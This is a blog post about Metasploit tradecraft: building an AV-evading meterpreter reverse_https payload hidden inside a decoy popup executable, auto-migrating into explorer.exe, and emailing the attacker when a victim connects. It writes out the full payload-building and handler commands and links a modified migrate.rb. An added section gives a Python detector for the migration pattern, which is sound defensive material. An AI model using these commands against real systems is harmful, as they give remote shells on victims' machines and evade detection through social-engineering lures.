Wednesday, October 6, 2010

Metasploit migrate and e-mail.

Not all hacks happen instantly; sometimes you have to wait. The problem is that you might have to wait for days, especially when social engineering is part of the process.

Even if all goes well and the attack succeeds, the payload is a meterpreter connect-back shell that will take me to the magic world of new and exciting data. There are some problems here. To go undetected, the binary is encoded using a custom template (a small custom application that shows a popup), and this is problem A: the application runs for only a few seconds and then closes, closing meterpreter and my connection along the way. The other problem is that I don't know when the connection is going to take place; it might happen in a few days or even in a couple of weeks. That is problem B.

Problem A is easily solved by using a migrate script to migrate into another process; explorer.exe is my preference. So the story on the metasploit console goes like this:

./msfpayload windows/meterpreter/reverse_https LHOST=my_dynamic_dns_host LPORT=443 R |./msfencode -k -x ./popup.exe -c 3 -e x86/shikata_ga_nai -t exe -o popup_out.exe

This will create a roughly undetected binary with meterpreter inside.

On the Metasploit console, now running under screen:
./msfconsole

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set ExitOnSession false
set LHOST my_dynamic_dns_host
set LPORT 443
set AutoRunScript migrate explorer.exe
exploit -j


This will take care of problem A.
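
Seen from the defending side, the fix for problem A leaves a recognisable sequence: a new process starts, a thread is created in explorer.exe, the new process exits seconds later, and explorer.exe is left holding the outbound connection on port 443. The following is an added example, not part of the original post or of Metasploit; it correlates constructed events that use Sysmon event IDs (1, 3, 5, 8) and assumes the endpoint reports the migration as a cross-process thread creation. The simplified field names, paths, PIDs and the 30-second threshold are assumptions.

```python
from datetime import datetime, timedelta

EXPLORER = r"C:\Windows\explorer.exe"
CARRIER = r"C:\Users\bob\Downloads\popup_out.exe"   # constructed path
HELPER = r"C:\Program Files\Vendor\helper.exe"      # constructed long-running process

# Constructed sample events, simplified from Sysmon:
# 1 = process create, 3 = network connect, 5 = process exit, 8 = CreateRemoteThread.
EVENTS = [
    {"id": 1, "t": "09:00:00", "pid": 4120, "image": CARRIER},
    {"id": 8, "t": "09:00:02", "pid": 4120, "image": CARRIER,
     "dst_pid": 3156, "dst_image": EXPLORER},
    {"id": 5, "t": "09:00:06", "pid": 4120, "image": CARRIER},
    {"id": 3, "t": "09:00:07", "pid": 3156, "image": EXPLORER, "port": 443},
    {"id": 1, "t": "09:10:00", "pid": 5000, "image": HELPER},
    {"id": 8, "t": "09:10:01", "pid": 5000, "image": HELPER,
     "dst_pid": 3156, "dst_image": EXPLORER},
]

def ts(event):
    return datetime.strptime(event["t"], "%H:%M:%S")

def find_migrations(events, max_lifetime=timedelta(seconds=30)):
    """Flag a remote thread created by a process that exits shortly afterwards,
    leaving the target process to carry the outbound connection.
    PID reuse is ignored to keep the example short."""
    started = {e["pid"]: ts(e) for e in events if e["id"] == 1}
    exited = {e["pid"]: ts(e) for e in events if e["id"] == 5}
    findings = []
    for e in (x for x in events if x["id"] == 8):
        src, dst, when = e["pid"], e["dst_pid"], ts(e)
        if src == dst or src not in started or src not in exited:
            continue  # source still running, or its start was not recorded
        if not (when <= exited[src] <= started[src] + max_lifetime):
            continue  # source outlived the short-lived-carrier window
        ports = sorted({n["port"] for n in events
                        if n["id"] == 3 and n["pid"] == dst and ts(n) >= when})
        findings.append({
            "source": e["image"], "target": e["dst_image"], "target_pid": dst,
            "lifetime_s": (exited[src] - started[src]).total_seconds(),
            "target_ports_after": ports,
        })
    return findings

if __name__ == "__main__":
    for finding in find_migrations(EVENTS):
        print(finding)
```

Only the short-lived carrier is reported; the helper process that stays running after creating its thread is not.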

Moving on to problem B now.

By default, metasploit doesn't provide any way to inform the attacker about the progress of the attack if he is not looking at the console screen directly. To overcome this, I made a small modification to the migrate.rb script located in the scripts/ directory under the metasploit root directory. The modification does the following: when the attack succeeds and migration is complete, a mail is sent to a specific address to report the success.

meterpreter > run migrate notepad.exe
[*] Current server process: Explorer.EXE (3156)
[*] Migrating to notepad.exe...
[*] Migrating into process ID 5064
[*] New server process: notepad.exe (5064)
[*] Emailing myself@myhost

The modified migrate.rb can be found here: http://www.deventum.com/research/migrate.rb. If you use it, don't forget to change the e-mail address :)